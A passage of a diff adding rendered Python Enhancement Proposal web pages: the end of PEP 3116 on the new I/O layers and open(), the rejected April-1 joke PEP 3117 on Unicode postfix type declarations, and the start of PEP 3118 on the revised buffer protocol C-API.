The BufferedWriter implementation is for sequential-access +write-only objects. Its .flush() method forces all cached data to +be written to the underlying RawIOBase object.

+
+
+

BufferedRWPair

+

The BufferedRWPair implementation is for sequential-access +read-write objects such as sockets and ttys. As the read and write +streams of these objects are completely independent, it could be +implemented by simply incorporating a BufferedReader and +BufferedWriter instance. It provides a .flush() method that +has the same semantics as a BufferedWriter’s .flush() method.

+
+
+

BufferedRandom

+

The BufferedRandom implementation is for all random-access +objects, whether they are read-only, write-only, or read-write. +Compared to the previous classes that operate on sequential-access +objects, the BufferedRandom class must contend with the user +calling .seek() to reposition the stream. Therefore, an instance +of BufferedRandom must keep track of both the logical and true +position within the object. It provides a .flush() method that +forces all cached write data to be written to the underlying +RawIOBase object and all cached read data to be forgotten (so that +future reads are forced to go back to the disk).

+

Q: Do we want to mandate in the specification that switching between +reading and writing on a read-write object implies a .flush()? Or is +that an implementation convenience that users should not rely on?

+

For a read-only BufferedRandom object, .writable() returns +False and the .write() and .truncate() methods throw +IOError.

+

For a write-only BufferedRandom object, .readable() returns +False and the .read() method throws IOError.

+
+
+
+

Text I/O

+

The text I/O layer provides functions to read and write strings from +streams. Some new features include universal newlines and character +set encoding and decoding. The Text I/O layer is defined by a +TextIOBase abstract base class. It provides several methods that +are similar to the BufferedIOBase methods, but operate on a +per-character basis instead of a per-byte basis. These methods are:

+
+
.read(n: int = -1) -> str

.write(s: str) -> int

+

.tell() -> object

+
+
Return a cookie describing the current file position. +The only supported use for the cookie is with .seek() +with whence set to 0 (i.e. absolute seek).
+

.seek(pos: object, whence: int = 0) -> int

+
+
Seek to position pos. If pos is non-zero, it must +be a cookie returned from .tell() and whence must be zero.
+

.truncate(pos: object = None) -> int

+
+
Like BufferedIOBase.truncate(), except that pos (if +not None) must be a cookie previously returned by .tell().
+
+

Unlike with raw I/O, the units for .seek() are not specified - some +implementations (e.g. StringIO) use characters and others +(e.g. TextIOWrapper) use bytes. The special case for zero is to +allow going to the start or end of a stream without a prior +.tell(). An implementation could include stream encoder state in +the cookie returned from .tell().

+

TextIOBase implementations also provide several methods that are +pass-throughs to the underlying BufferedIOBase objects:

+
+
.flush() -> None

.close() -> None

+

.readable() -> bool

+

.writable() -> bool

+

.seekable() -> bool

+
+

TextIOBase class implementations additionally provide the +following methods:

+
+
.readline() -> str
+
Read until newline or EOF and return the line, or "" if +EOF hit immediately.
+

.__iter__() -> Iterator

+
+
Returns an iterator that returns lines from the file (which +happens to be self).
+

.next() -> str

+
+
Same as readline() except raises StopIteration if EOF +hit immediately.
+
+

Two implementations will be provided by the Python library. The +primary implementation, TextIOWrapper, wraps a Buffered I/O +object. Each TextIOWrapper object has a property named +“.buffer” that provides a reference to the underlying +BufferedIOBase object. Its initializer has the following +signature:

+
+
.__init__(self, buffer, encoding=None, errors=None, newline=None, line_buffering=False)
+
buffer is a reference to the BufferedIOBase object to +be wrapped with the TextIOWrapper.

encoding refers to an encoding to be used for translating +between the byte-representation and character-representation. +If it is None, then the system’s locale setting will be +used as the default.

+

errors is an optional string indicating error handling. +It may be set whenever encoding may be set. It defaults +to 'strict'.

+

newline can be None, '', '\n', '\r', or +'\r\n'; all other values are illegal. It controls the +handling of line endings. It works as follows:

+
    +
  • On input, if newline is None, universal newlines +mode is enabled. Lines in the input can end in '\n', +'\r', or '\r\n', and these are translated into +'\n' before being returned to the caller. If it is +'', universal newline mode is enabled, but line endings +are returned to the caller untranslated. If it has any of +the other legal values, input lines are only terminated by +the given string, and the line ending is returned to the +caller untranslated. (In other words, translation to +'\n' only occurs if newline is None.)
  • +
  • On output, if newline is None, any '\n' +characters written are translated to the system default +line separator, os.linesep. If newline is '', +no translation takes place. If newline is any of the +other legal values, any '\n' characters written are +translated to the given string. (Note that the rules +guiding translation are different for output than for +input.)
  • +
+

line_buffering, if True, causes write() calls to imply +a flush() if the string written contains at least one +'\n' or '\r' character. This is set by open() +when it detects that the underlying stream is a TTY device, +or when a buffering argument of 1 is passed.

+

Further notes on the newline parameter:

+
    +
  • '\r' support is still needed for some OSX applications +that produce files using '\r' line endings; Excel (when +exporting to text) and Adobe Illustrator EPS files are the +most common examples.
  • +
  • If translation is enabled, it happens regardless of which +method is called for reading or writing. For example, +f.read() will always produce the same result as +''.join(f.readlines()).
  • +
  • If universal newlines without translation are requested on +input (i.e. newline=''), if a system read operation +returns a buffer ending in '\r', another system read +operation is done to determine whether it is followed by +'\n' or not. In universal newlines mode with +translation, the second system read operation may be +postponed until the next read request, and if the following +system read operation returns a buffer starting with +'\n', that character is simply discarded.
  • +
+
+
+

Another implementation, StringIO, creates a file-like TextIO +implementation without an underlying Buffered I/O object. While +similar functionality could be provided by wrapping a BytesIO +object in a TextIOWrapper, the StringIO object allows for much +greater efficiency as it does not need to actually performing encoding +and decoding. A String I/O object can just store the encoded string +as-is. The StringIO object’s __init__ signature takes an +optional string specifying the initial value; the initial position is +always 0. It does not support encodings or newline translations; you +always read back exactly the characters you wrote.

+
+

Unicode encoding/decoding Issues

+

We should allow changing the encoding and error-handling +setting later. The behavior of Text I/O operations in the face of +Unicode problems and ambiguities (e.g. diacritics, surrogates, invalid +bytes in an encoding) should be the same as that of the unicode +encode()/decode() methods. UnicodeError may be raised.

+

Implementation note: we should be able to reuse much of the +infrastructure provided by the codecs module. If it doesn’t +provide the exact APIs we need, we should refactor it to avoid +reinventing the wheel.

+
+
+
+

Non-blocking I/O

+

Non-blocking I/O is fully supported on the Raw I/O level only. If a +raw object is in non-blocking mode and an operation would block, then +.read() and .readinto() return None, while .write() +returns 0. In order to put an object in non-blocking mode, +the user must extract the fileno and do it by hand.

+

At the Buffered I/O and Text I/O layers, if a read or write fails due +a non-blocking condition, they raise an IOError with errno set +to EAGAIN.

+

Originally, we considered propagating up the Raw I/O behavior, but +many corner cases and problems were raised. To address these issues, +significant changes would need to have been made to the Buffered I/O +and Text I/O layers. For example, what should .flush() do on a +Buffered non-blocking object? How would the user instruct the object +to “Write as much as you can from your buffer, but don’t block”? A +non-blocking .flush() that doesn’t necessarily flush all available +data is counter-intuitive. Since non-blocking and blocking objects +would have such different semantics at these layers, it was agreed to +abandon efforts to combine them into a single type.

+
+
+

The open() Built-in Function

+

The open() built-in function is specified by the following +pseudo-code:

+
def open(filename, mode="r", buffering=None, *,
+         encoding=None, errors=None, newline=None):
+    assert isinstance(filename, (str, int))
+    assert isinstance(mode, str)
+    assert buffering is None or isinstance(buffering, int)
+    assert encoding is None or isinstance(encoding, str)
+    assert newline in (None, "", "\n", "\r", "\r\n")
+    modes = set(mode)
+    if modes - set("arwb+t") or len(mode) > len(modes):
+        raise ValueError("invalid mode: %r" % mode)
+    reading = "r" in modes
+    writing = "w" in modes
+    binary = "b" in modes
+    appending = "a" in modes
+    updating = "+" in modes
+    text = "t" in modes or not binary
+    if text and binary:
+        raise ValueError("can't have text and binary mode at once")
+    if reading + writing + appending > 1:
+        raise ValueError("can't have read/write/append mode at once")
+    if not (reading or writing or appending):
+        raise ValueError("must have exactly one of read/write/append mode")
+    if binary and encoding is not None:
+        raise ValueError("binary modes doesn't take an encoding arg")
+    if binary and errors is not None:
+        raise ValueError("binary modes doesn't take an errors arg")
+    if binary and newline is not None:
+        raise ValueError("binary modes doesn't take a newline arg")
+    # XXX Need to spec the signature for FileIO()
+    raw = FileIO(filename, mode)
+    line_buffering = (buffering == 1 or buffering is None and raw.isatty())
+    if line_buffering or buffering is None:
+        buffering = 8*1024  # International standard buffer size
+        # XXX Try setting it to fstat().st_blksize
+    if buffering < 0:
+        raise ValueError("invalid buffering size")
+    if buffering == 0:
+        if binary:
+            return raw
+        raise ValueError("can't have unbuffered text I/O")
+    if updating:
+        buffer = BufferedRandom(raw, buffering)
+    elif writing or appending:
+        buffer = BufferedWriter(raw, buffering)
+    else:
+        assert reading
+        buffer = BufferedReader(raw, buffering)
+    if binary:
+        return buffer
+    assert text
+    return TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3116.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3117/index.html b/pep-3117/index.html new file mode 100644 index 00000000000..1a22b8bc2c8 --- /dev/null +++ b/pep-3117/index.html @@ -0,0 +1,378 @@ + + + + + + + + PEP 3117 – Postfix type declarations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3117 – Postfix type declarations

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of a postfix type declaration syntax to +Python. It also specifies a new typedef statement which is used to create +new mappings between types and declarators.

+

Its acceptance will greatly enhance the Python user experience as well as +eliminate one of the warts that deter users of other programming languages from +switching to Python.

+
+
+

Rationale

+

Python has long suffered from the lack of explicit type declarations. Being one +of the few aspects in which the language deviates from its Zen, this wart has +sparked many a discussion between Python heretics and members of the PSU (for +a few examples, see [EX1], [EX2] or [EX3]), and it also made it a large-scale +enterprise success unlikely.

+

However, if one wants to put an end to this misery, a decent Pythonic syntax +must be found. In almost all languages that have them, type declarations lack +this quality: they are verbose, often needing multiple words for a single +type, or they are hard to comprehend (e.g., a certain language uses completely +unrelated [1] adjectives like dim for type declaration).

+

Therefore, this PEP combines the move to type declarations with another bold +move that will once again prove that Python is not only future-proof but +future-embracing: the introduction of Unicode characters as an integral +constituent of source code.

+

Unicode makes it possible to express much more with much less characters, which +is in accordance with the Zen (“Readability counts.”). Additionally, it +eliminates the need for a separate type declaration statement, and last but not +least, it makes Python measure up to Perl 6, which already uses Unicode for its +operators. [2]

+
+
+

Specification

+

When the type declaration mode is in operation, the grammar is changed so that +each NAME must consist of two parts: a name and a type declarator, which is +exactly one Unicode character.

+

The declarator uniquely specifies the type of the name, and if it occurs on the +left hand side of an expression, this type is enforced: an InquisitionError +exception is raised if the returned type doesn’t match the declared type. [3]

+

Also, function call result types have to be specified. If the result of the call +does not have the declared type, an InquisitionError is raised. Caution: the +declarator for the result should not be confused with the declarator for the +function object (see the example below).

+

Type declarators after names that are only read, not assigned to, are not strictly +necessary but enforced anyway (see the Python Zen: “Explicit is better than +implicit.”).

+

The mapping between types and declarators is not static. It can be completely +customized by the programmer, but for convenience there are some predefined +mappings for some built-in types:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
TypeDeclarator
object� (REPLACEMENT CHARACTER)
intℕ (DOUBLE-STRUCK CAPITAL N)
float℮ (ESTIMATED SYMBOL)
bool✓ (CHECK MARK)
complexℂ (DOUBLE-STRUCK CAPITAL C)
str✎ (LOWER RIGHT PENCIL)
unicode✒ (BLACK NIB)
tuple⒯ (PARENTHESIZED LATIN SMALL LETTER T)
list♨ (HOT SPRINGS)
dict⧟ (DOUBLE-ENDED MULTIMAP)
set∅ (EMPTY SET) (Note: this is also for full sets)
frozenset☃ (SNOWMAN)
datetime⌚ (WATCH)
functionƛ (LATIN SMALL LETTER LAMBDA WITH STROKE)
generator⚛ (ATOM SYMBOL)
Exception⌁ (ELECTRIC ARROW)
+

The declarator for the None type is a zero-width space.

+

These characters should be obvious and easy to remember and type for every +programmer.

+
+
+

Unicode replacement units

+

Since even in our modern, globalized world there are still some old-fashioned +rebels who can’t or don’t want to use Unicode in their source code, and since +Python is a forgiving language, a fallback is provided for those:

+

Instead of the single Unicode character, they can type name${UNICODE NAME OF +THE DECLARATOR}$. For example, these two function definitions are equivalent:

+
def fooƛ(xℂ):
+    return None
+
+
+

and

+
def foo${LATIN SMALL LETTER LAMBDA WITH STROKE}$(x${DOUBLE-STRUCK CAPITAL C}$):
+    return None${ZERO WIDTH NO-BREAK SPACE}$
+
+
+

This is still easy to read and makes the full power of type-annotated Python +available to ASCII believers.

+
+
+

The typedef statement

+

The mapping between types and declarators can be extended with this new statement.

+

The syntax is as follows:

+
typedef_stmt  ::=  "typedef" expr DECLARATOR
+
+
+

where expr resolves to a type object. For convenience, the typedef statement +can also be mixed with the class statement for new classes, like so:

+
typedef class Foo☺(object�):
+    pass
+
+
+
+
+

Example

+

This is the standard os.path.normpath function, converted to type declaration +syntax:

+
def normpathƛ(path✎)✎:
+    """Normalize path, eliminating double slashes, etc."""
+    if path✎ == '':
+        return '.'
+    initial_slashes✓ = path✎.startswithƛ('/')✓
+    # POSIX allows one or two initial slashes, but treats three or more
+    # as single slash.
+    if (initial_slashes✓ and
+        path✎.startswithƛ('//')✓ and not path✎.startswithƛ('///')✓)✓:
+        initial_slashesℕ = 2
+    comps♨ = path✎.splitƛ('/')♨
+    new_comps♨ = []♨
+    for comp✎ in comps♨:
+        if comp✎ in ('', '.')⒯:
+            continue
+        if (comp✎ != '..' or (not initial_slashesℕ and not new_comps♨)✓ or
+             (new_comps♨ and new_comps♨[-1]✎ == '..')✓)✓:
+            new_comps♨.appendƛ(comp✎)
+        elif new_comps♨:
+            new_comps♨.popƛ()✎
+    comps♨ = new_comps♨
+    path✎ = '/'.join(comps♨)✎
+    if initial_slashesℕ:
+        path✎ = '/'*initial_slashesℕ + path✎
+    return path✎ or '.'
+
+
+

As you can clearly see, the type declarations add expressiveness, while at the +same time they make the code look much more professional.

+
+
+

Compatibility issues

+

To enable type declaration mode, one has to write:

+
from __future__ import type_declarations
+
+
+

which enables Unicode parsing of the source [4], makes typedef a keyword +and enforces correct types for all assignments and function calls.

+
+
+

Rejection

+

After careful considering, much soul-searching, gnashing of teeth and rending +of garments, it has been decided to reject this PEP.

+
+
+

References

+ + +
+
+

Acknowledgements

+

Many thanks go to Armin Ronacher, Alexander Schremmer and Marek Kubica who helped +find the most suitable and mnemonic declarator for built-in types.

+

Thanks also to the Unicode Consortium for including all those useful characters +in the Unicode standard.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3117.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3118/index.html b/pep-3118/index.html new file mode 100644 index 00000000000..d2f8f05f51c --- /dev/null +++ b/pep-3118/index.html @@ -0,0 +1,1030 @@ + + + + + + + + PEP 3118 – Revising the buffer protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3118 – Revising the buffer protocol

+
+
Author:
+
Travis Oliphant <oliphant at ee.byu.edu>, Carl Banks <pythondev at aerojockey.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Aug-2006
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes re-designing the buffer interface (PyBufferProcs +function pointers) to improve the way Python allows memory sharing in +Python 3.0

+

In particular, it is proposed that the character buffer portion +of the API be eliminated and the multiple-segment portion be +re-designed in conjunction with allowing for strided memory +to be shared. In addition, the new buffer interface will +allow the sharing of any multi-dimensional nature of the +memory and what data-format the memory contains.

+

This interface will allow any extension module to either +create objects that share memory or create algorithms that +use and manipulate raw memory from arbitrary objects that +export the interface.

+
+
+

Rationale

+

The Python 2.X buffer protocol allows different Python types to +exchange a pointer to a sequence of internal buffers. This +functionality is extremely useful for sharing large segments of +memory between different high-level objects, but it is too limited and +has issues:

+
    +
  1. There is the little used “sequence-of-segments” option +(bf_getsegcount) that is not well motivated.
  2. +
  3. There is the apparently redundant character-buffer option +(bf_getcharbuffer)
  4. +
  5. There is no way for a consumer to tell the buffer-API-exporting +object it is “finished” with its view of the memory and +therefore no way for the exporting object to be sure that it is +safe to reallocate the pointer to the memory that it owns (for +example, the array object reallocating its memory after sharing +it with the buffer object which held the original pointer led +to the infamous buffer-object problem).
  6. +
  7. Memory is just a pointer with a length. There is no way to +describe what is “in” the memory (float, int, C-structure, etc.)
  8. +
  9. There is no shape information provided for the memory. But, +several array-like Python types could make use of a standard +way to describe the shape-interpretation of the memory +(wxPython, GTK, pyQT, CVXOPT, PyVox, Audio and Video +Libraries, ctypes, NumPy, data-base interfaces, etc.)
  10. +
  11. There is no way to share discontiguous memory (except through +the sequence of segments notion).

    There are two widely used libraries that use the concept of +discontiguous memory: PIL and NumPy. Their view of discontiguous +arrays is different, though. The proposed buffer interface allows +sharing of either memory model. Exporters will typically use only one +approach and consumers may choose to support discontiguous +arrays of each type however they choose.

    +

    NumPy uses the notion of constant striding in each dimension as its +basic concept of an array. With this concept, a simple sub-region +of a larger array can be described without copying the data. +Thus, stride information is the additional information that must be +shared.

    +

    The PIL uses a more opaque memory representation. Sometimes an +image is contained in a contiguous segment of memory, but sometimes +it is contained in an array of pointers to the contiguous segments +(usually lines) of the image. The PIL is where the idea of multiple +buffer segments in the original buffer interface came from.

    +

    NumPy’s strided memory model is used more often in computational +libraries and because it is so simple it makes sense to support +memory sharing using this model. The PIL memory model is sometimes +used in C-code where a 2-d array can then be accessed using double +pointer indirection: e.g. image[i][j].

    +

    The buffer interface should allow the object to export either of these +memory models. Consumers are free to either require contiguous memory +or write code to handle one or both of these memory models.

    +
  12. +
+
+
+

Proposal Overview

+
    +
  • Eliminate the char-buffer and multiple-segment sections of the +buffer-protocol.
  • +
  • Unify the read/write versions of getting the buffer.
  • +
  • Add a new function to the interface that should be called when +the consumer object is “done” with the memory area.
  • +
  • Add a new variable to allow the interface to describe what is in +memory (unifying what is currently done now in struct and +array)
  • +
  • Add a new variable to allow the protocol to share shape information
  • +
  • Add a new variable for sharing stride information
  • +
  • Add a new mechanism for sharing arrays that must +be accessed using pointer indirection.
  • +
  • Fix all objects in the core and the standard library to conform +to the new interface
  • +
  • Extend the struct module to handle more format specifiers
  • +
  • Extend the buffer object into a new memory object which places +a Python veneer around the buffer interface.
  • +
  • Add a few functions to make it easy to copy contiguous data +in and out of object supporting the buffer interface.
  • +
+
+
+

Specification

+

While the new specification allows for complicated memory sharing, +simple contiguous buffers of bytes can still be obtained from an +object. In fact, the new protocol allows a standard mechanism for +doing this even if the original object is not represented as a +contiguous chunk of memory.

+

The easiest way to obtain a simple contiguous chunk of memory is +to use the provided C-API to obtain a chunk of memory.

+

Change the PyBufferProcs structure to

+
typedef struct {
+     getbufferproc bf_getbuffer;
+     releasebufferproc bf_releasebuffer;
+} PyBufferProcs;
+
+
+

Both of these routines are optional for a type object

+
typedef int (*getbufferproc)(PyObject *obj, PyBuffer *view, int flags)
+
+
+

This function returns 0 on success and -1 on failure (and raises an +error). The first variable is the “exporting” object. The second +argument is the address to a bufferinfo structure. Both arguments must +never be NULL.

+

The third argument indicates what kind of buffer the consumer is +prepared to deal with and therefore what kind of buffer the exporter +is allowed to return. The new buffer interface allows for much more +complicated memory sharing possibilities. Some consumers may not be +able to handle all the complexity but may want to see if the +exporter will let them take a simpler view to its memory.

+

In addition, some exporters may not be able to share memory in every +possible way and may need to raise errors to signal to some consumers +that something is just not possible. These errors should be +PyErr_BufferError unless there is another error that is actually +causing the problem. The exporter can use flags information to +simplify how much of the PyBuffer structure is filled in with +non-default values and/or raise an error if the object can’t support a +simpler view of its memory.

+

The exporter should always fill in all elements of the buffer +structure (with defaults or NULLs if nothing else is requested). The +PyBuffer_FillInfo function can be used for simple cases.

+
+

Access flags

+

Some flags are useful for requesting a specific kind of memory +segment, while others indicate to the exporter what kind of +information the consumer can deal with. If certain information is not +asked for by the consumer, but the exporter cannot share its memory +without that information, then a PyErr_BufferError should be raised.

+

PyBUF_SIMPLE

+
+
This is the default flag state (0). The returned buffer may or may +not have writable memory. The format will be assumed to be +unsigned bytes. This is a “stand-alone” flag constant. It never +needs to be |’d to the others. The exporter will raise an error if +it cannot provide such a contiguous buffer of bytes.
+

PyBUF_WRITABLE

+
+
The returned buffer must be writable. If it is not writable, +then raise an error.
+

PyBUF_FORMAT

+
+
The returned buffer must have true format information if this flag +is provided. This would be used when the consumer is going to be +checking for what ‘kind’ of data is actually stored. An exporter +should always be able to provide this information if requested. If +format is not explicitly requested then the format must be returned +as NULL (which means “B”, or unsigned bytes)
+

PyBUF_ND

+
+
The returned buffer must provide shape information. The memory will +be assumed C-style contiguous (last dimension varies the fastest). +The exporter may raise an error if it cannot provide this kind of +contiguous buffer. If this is not given then shape will be NULL.
+

PyBUF_STRIDES (implies PyBUF_ND)

+
+
The returned buffer must provide strides information (i.e. the +strides cannot be NULL). This would be used when the consumer can +handle strided, discontiguous arrays. Handling strides +automatically assumes you can handle shape. The exporter may raise +an error if cannot provide a strided-only representation of the +data (i.e. without the suboffsets).
+
+
PyBUF_C_CONTIGUOUS
+
PyBUF_F_CONTIGUOUS
+
PyBUF_ANY_CONTIGUOUS
+
+
+
These flags indicate that the returned buffer must be respectively, +C-contiguous (last dimension varies the fastest), Fortran +contiguous (first dimension varies the fastest) or either one. +All of these flags imply PyBUF_STRIDES and guarantee that the +strides buffer info structure will be filled in correctly.
+

PyBUF_INDIRECT (implies PyBUF_STRIDES)

+
+
The returned buffer must have suboffsets information (which can be +NULL if no suboffsets are needed). This would be used when the +consumer can handle indirect array referencing implied by these +suboffsets.
+

Specialized combinations of flags for specific kinds of memory_sharing.

+
+
Multi-dimensional (but contiguous)
+
+
PyBUF_CONTIG (PyBUF_ND | PyBUF_WRITABLE)
+
PyBUF_CONTIG_RO (PyBUF_ND)
+
+
+

Multi-dimensional using strides but aligned

+
+
+
PyBUF_STRIDED (PyBUF_STRIDES | PyBUF_WRITABLE)
+
PyBUF_STRIDED_RO (PyBUF_STRIDES)
+
+
+

Multi-dimensional using strides and not necessarily aligned

+
+
+
PyBUF_RECORDS (PyBUF_STRIDES | PyBUF_WRITABLE | PyBUF_FORMAT)
+
PyBUF_RECORDS_RO (PyBUF_STRIDES | PyBUF_FORMAT)
+
+
+

Multi-dimensional using sub-offsets

+
+
+
PyBUF_FULL (PyBUF_INDIRECT | PyBUF_WRITABLE | PyBUF_FORMAT)
+
PyBUF_FULL_RO (PyBUF_INDIRECT | PyBUF_FORMAT)
+
+
+
+

Thus, the consumer simply wanting a contiguous chunk of bytes from +the object would use PyBUF_SIMPLE, while a consumer that understands +how to make use of the most complicated cases could use PyBUF_FULL.

+

The format information is only guaranteed to be non-NULL if +PyBUF_FORMAT is in the flag argument, otherwise it is expected the +consumer will assume unsigned bytes.

+

There is a C-API that simple exporting objects can use to fill-in the +buffer info structure correctly according to the provided flags if a +contiguous chunk of “unsigned bytes” is all that can be exported.

+
+
+

The Py_buffer struct

+

The bufferinfo structure is:

+
struct bufferinfo {
+     void *buf;
+     Py_ssize_t len;
+     int readonly;
+     const char *format;
+     int ndim;
+     Py_ssize_t *shape;
+     Py_ssize_t *strides;
+     Py_ssize_t *suboffsets;
+     Py_ssize_t itemsize;
+     void *internal;
+} Py_buffer;
+
+
+

Before calling the bf_getbuffer function, the bufferinfo structure can +be filled with whatever, but the buf field must be NULL when +requesting a new buffer. Upon return from bf_getbuffer, the +bufferinfo structure is filled in with relevant information about the +buffer. This same bufferinfo structure must be passed to +bf_releasebuffer (if available) when the consumer is done with the +memory. The caller is responsible for keeping a reference to obj until +releasebuffer is called (i.e. the call to bf_getbuffer does not alter +the reference count of obj).

+

The members of the bufferinfo structure are:

+
+
buf
a pointer to the start of the memory for the object
+
len
the total bytes of memory the object uses. This should be the +same as the product of the shape array multiplied by the number of +bytes per item of memory.
+
readonly
an integer variable to hold whether or not the memory is readonly. +1 means the memory is readonly, zero means the memory is writable.
+
format
a NULL-terminated format-string (following the struct-style syntax +including extensions) indicating what is in each element of +memory. The number of elements is len / itemsize, where itemsize +is the number of bytes implied by the format. This can be NULL which +implies standard unsigned bytes (“B”).
+
ndim
a variable storing the number of dimensions the memory represents. +Must be >=0. A value of 0 means that shape and strides and suboffsets +must be NULL (i.e. the memory represents a scalar).
+
shape
an array of Py_ssize_t of length ndims indicating the +shape of the memory as an N-D array. Note that ((*shape)[0] * +... * (*shape)[ndims-1])*itemsize = len. If ndims is 0 (indicating +a scalar), then this must be NULL.
+
strides
address of a Py_ssize_t* variable that will be filled with a +pointer to an array of Py_ssize_t of length ndims (or NULL +if ndims is 0). indicating the number of bytes to skip to get to +the next element in each dimension. If this is not requested by +the caller (PyBUF_STRIDES is not set), then this should be set +to NULL which indicates a C-style contiguous array or a +PyExc_BufferError raised if this is not possible.
+
suboffsets
address of a Py_ssize_t * variable that will be filled with a +pointer to an array of Py_ssize_t of length *ndims. If +these suboffset numbers are >=0, then the value stored along the +indicated dimension is a pointer and the suboffset value dictates +how many bytes to add to the pointer after de-referencing. A +suboffset value that it negative indicates that no de-referencing +should occur (striding in a contiguous memory block). If all +suboffsets are negative (i.e. no de-referencing is needed, then +this must be NULL (the default value). If this is not requested +by the caller (PyBUF_INDIRECT is not set), then this should be +set to NULL or an PyExc_BufferError raised if this is not possible.

For clarity, here is a function that returns a pointer to the +element in an N-D array pointed to by an N-dimensional index when +there are both non-NULL strides and suboffsets:

+
void *get_item_pointer(int ndim, void *buf, Py_ssize_t *strides,
+                       Py_ssize_t *suboffsets, Py_ssize_t *indices) {
+    char *pointer = (char*)buf;
+    int i;
+    for (i = 0; i < ndim; i++) {
+        pointer += strides[i] * indices[i];
+        if (suboffsets[i] >=0 ) {
+            pointer = *((char**)pointer) + suboffsets[i];
+        }
+    }
+    return (void*)pointer;
+}
+
+
+

Notice the suboffset is added “after” the dereferencing occurs. +Thus slicing in the ith dimension would add to the suboffsets in +the (i-1)st dimension. Slicing in the first dimension would change +the location of the starting pointer directly (i.e. buf would +be modified).

+
+
itemsize
This is a storage for the itemsize (in bytes) of each element of the shared +memory. It is technically un-necessary as it can be obtained using +PyBuffer_SizeFromFormat, however an exporter may know this +information without parsing the format string and it is necessary +to know the itemsize for proper interpretation of striding. +Therefore, storing it is more convenient and faster.
+
internal
This is for use internally by the exporting object. For example, +this might be re-cast as an integer by the exporter and used to +store flags about whether or not the shape, strides, and suboffsets +arrays must be freed when the buffer is released. The consumer +should never alter this value.
+
+

The exporter is responsible for making sure that any memory pointed to +by buf, format, shape, strides, and suboffsets is valid until +releasebuffer is called. If the exporter wants to be able to change +an object’s shape, strides, and/or suboffsets before releasebuffer is +called then it should allocate those arrays when getbuffer is called +(pointing to them in the buffer-info structure provided) and free them +when releasebuffer is called.

+
+
+

Releasing the buffer

+

The same bufferinfo struct should be used in the release-buffer +interface call. The caller is responsible for the memory of the +Py_buffer structure itself.

+
typedef void (*releasebufferproc)(PyObject *obj, Py_buffer *view)
+
+
+

Callers of getbufferproc must make sure that this function is called +when memory previously acquired from the object is no longer needed. +The exporter of the interface must make sure that any memory pointed +to in the bufferinfo structure remains valid until releasebuffer is +called.

+

If the bf_releasebuffer function is not provided (i.e. it is NULL), +then it does not ever need to be called.

+

Exporters will need to define a bf_releasebuffer function if they can +re-allocate their memory, strides, shape, suboffsets, or format +variables which they might share through the struct bufferinfo. +Several mechanisms could be used to keep track of how many getbuffer +calls have been made and shared. Either a single variable could be +used to keep track of how many “views” have been exported, or a +linked-list of bufferinfo structures filled in could be maintained in +each object.

+

All that is specifically required by the exporter, however, is to +ensure that any memory shared through the bufferinfo structure remains +valid until releasebuffer is called on the bufferinfo structure +exporting that memory.

+
+
+
+

New C-API calls are proposed

+
int PyObject_CheckBuffer(PyObject *obj)
+
+
+

Return 1 if the getbuffer function is available otherwise 0.

+
int PyObject_GetBuffer(PyObject *obj, Py_buffer *view,
+                       int flags)
+
+
+

This is a C-API version of the getbuffer function call. It checks to +make sure object has the required function pointer and issues the +call. Returns -1 and raises an error on failure and returns 0 on +success.

+
void PyBuffer_Release(PyObject *obj, Py_buffer *view)
+
+
+

This is a C-API version of the releasebuffer function call. It checks +to make sure the object has the required function pointer and issues +the call. This function always succeeds even if there is no releasebuffer +function for the object.

+
PyObject *PyObject_GetMemoryView(PyObject *obj)
+
+
+

Return a memory-view object from an object that defines the buffer interface.

+

A memory-view object is an extended buffer object that could replace +the buffer object (but doesn’t have to as that could be kept as a +simple 1-d memory-view object). Its C-structure is

+
typedef struct {
+    PyObject_HEAD
+    PyObject *base;
+    Py_buffer view;
+} PyMemoryViewObject;
+
+
+

This is functionally similar to the current buffer object except a +reference to base is kept and the memory view is not re-grabbed. +Thus, this memory view object holds on to the memory of base until it +is deleted.

+

This memory-view object will support multi-dimensional slicing and be +the first object provided with Python to do so. Slices of the +memory-view object are other memory-view objects with the same base +but with a different view of the base object.

+

When an “element” from the memory-view is returned it is always a +bytes object whose format should be interpreted by the format +attribute of the memoryview object. The struct module can be used to +“decode” the bytes in Python if desired. Or the contents can be +passed to a NumPy array or other object consuming the buffer protocol.

+

The Python name will be

+

__builtin__.memoryview

+

Methods:

+
+
__getitem__ (will support multi-dimensional slicing)
+
__setitem__ (will support multi-dimensional slicing)
+
tobytes (obtain a new bytes-object of a copy of the memory).
+
tolist (obtain a “nested” list of the memory. Everything +is interpreted into standard Python objects +as the struct module unpack would do – in fact +it uses struct.unpack to accomplish it).
+
+

Attributes (taken from the memory of the base object):

+
    +
  • format
  • +
  • itemsize
  • +
  • shape
  • +
  • strides
  • +
  • suboffsets
  • +
  • readonly
  • +
  • ndim
  • +
+
Py_ssize_t PyBuffer_SizeFromFormat(const char *)
+
+
+

Return the implied itemsize of the data-format area from a struct-style +description.

+
PyObject * PyMemoryView_GetContiguous(PyObject *obj,  int buffertype,
+                                      char fortran)
+
+
+

